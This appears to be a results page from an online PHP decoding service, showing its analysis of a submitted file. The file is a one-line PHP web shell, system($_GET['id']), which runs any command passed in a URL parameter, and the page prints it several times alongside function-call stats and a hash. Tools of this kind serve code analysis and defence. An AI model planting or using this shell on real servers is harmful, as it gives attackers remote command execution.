Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<? system($_GET['id']); ?>..

Decoded Output download

<? 
 
system($_GET['id']); 
 
?>

Did this file decode correctly?

Original Code

<?

system($_GET['id']);

?>

Function Calls

system 1

Variables

None

Stats

MD5 1c03573f21094c3d9719b4fcf25853b8
Eval Count 0
Decode Time 48 ms